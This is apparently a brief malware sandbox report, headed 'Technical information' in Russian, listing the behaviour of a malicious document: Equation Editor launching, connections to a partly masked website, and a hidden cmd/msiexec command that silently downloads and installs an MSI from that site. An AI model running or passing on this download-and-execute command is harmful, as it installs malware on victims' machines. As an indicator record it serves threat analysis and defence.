Техническая информация
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/gorwxf.msi /quiet
- 'th####erstudio.com':80
- 'th####erstudio.com':443
- http://th####erstudio.com/modules/jmsslider/views/img/layers/app/gorwxf.msi
- 'th####erstudio.com':443
- DNS ASK th####erstudio.com
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/gorwxf.msi /quiet' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/gorwxf.msi /quiet